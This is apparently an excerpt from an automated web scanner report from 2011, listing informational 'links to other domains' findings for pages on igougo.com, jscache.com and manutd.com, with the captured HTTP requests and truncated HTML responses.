Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="7q9zFOyFqTPnc5W06UryrpkD0++Wka0AMjC1S1xA6P1yyTp8PCxurvnrk9jOzADXv65HGKV1PAMbdsNjVp0aWbrCQsVMDW+7SSf9eWpiDrdh5lUG1nQvUBpOJY8=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.212. http://www.igougo.com/traveldeals/ratefinder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" border="0"></a>
...[SNIP]...
<header>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.213. http://www.jscache.com/weimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gif&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 165
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:43 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.2*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.64*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" style="border:none; margin:0;" alt=" TripAdvisor"/>' );
19.214. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3173523|0|477|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3173523|0|477|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="180"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2969561;type=count861;cat=035lo346;ord=1;num=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106021|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106021|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://adserver.adtech.de/adserv|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&amp;quot; target=&amp;quot;_blank&amp;quot;&amp;
...[SNIP]...
</noscript><a href="http://www.aon.com/unitedin2010?lid=aonbutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Aon.ashx" alt="" width="120" height="90" /></a><a href="http://www.hublot.com" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Hublot.ashx" alt="" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...
19.215. http://www.manutd.com/Search-Results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3173523|0|477|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3173523|0|477|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="180"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106006|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2412768|0|150|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2412768|0|150|ADTECH;loc=300;key=key1+key2+key3+key4&quot; anchor=&quot;&quot; target=&quot;&quot; id
...[SNIP]...
</noscript><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.hublot.com" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Hublot.ashx" alt="" width="120" height="90" /></a><a href="http://www.aon.com/unitedin2010?lid=aonbutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Aon.ashx" alt="" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...
19.216. http://www.manutd.com/en/Club/Sponsors.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU Soccer Schools..-..This link will open in a new window"><a href="http://www.manutdsoccerschools.com/" target="_blank">MU Soccer Schools</a>
...[SNIP]...
<li Title="Click here to view..Disabled Supporters..-..This link will open in a new window"><a href="http://www.mudsa.org/" target="_blank">Disabled Supporters</a>
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106009|0|118|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106009|0|118|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="80"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
<p>
<a href="http://www.aon.com/default.jsp" target="_blank">Aon</a> Corporation (NYSE:AON) is the leading global provider of <a href="http://www.aon.com/risk-services/default.jsp" target="_blank">risk management</a> services, insurance and <a href="http://www.aon.com/reinsurance/default.jsp" target="_blank">reinsurance</a> brokerage, and <a href="http://www.aon.com/human-capital-consulting/default.jsp" target="_blank">human resources</a> solutions and <a href="http://www.aon.com/human-capital-consulting/outsourcing/outsourcing.jsp" target="_blank">outsourcing</a>
...[SNIP]...
<p>Through its more than 59,000 colleagues worldwide, Aon unites to deliver distinctive client value via innovative and effective risk management and <a href="http://www.aon.com/human-capital-consulting/human-capital/talent-strategy.jsp" target="_blank">workforce</a>
...[SNIP]...
<p>Named the world's best <a href="http://ir.aon.com/phoenix.zhtml?c=105697&amp;p=irol-newsArticle&amp;ID=1393233&amp;highlight=" target="_blank">broker</a>
...[SNIP]...
e insurance broker based on revenues in 2007, 2008 and 2009, and Aon was voted best insurance intermediary 2007-2010, best reinsurance intermediary 2006-2010, best captives manager 2009-2010, and best <a href="http://aon.mediaroom.com/index.php?s=43&amp;item=1936" target="_blank">employee benefits</a>
...[SNIP]...
<p>Visit <a href="http://www.aon.com/">http://www.aon.com</a> for more information on Aon and <a href="http://www.aon.com/manchesterunited">http://www.aon.com/manchesterunited</a>
...[SNIP]...
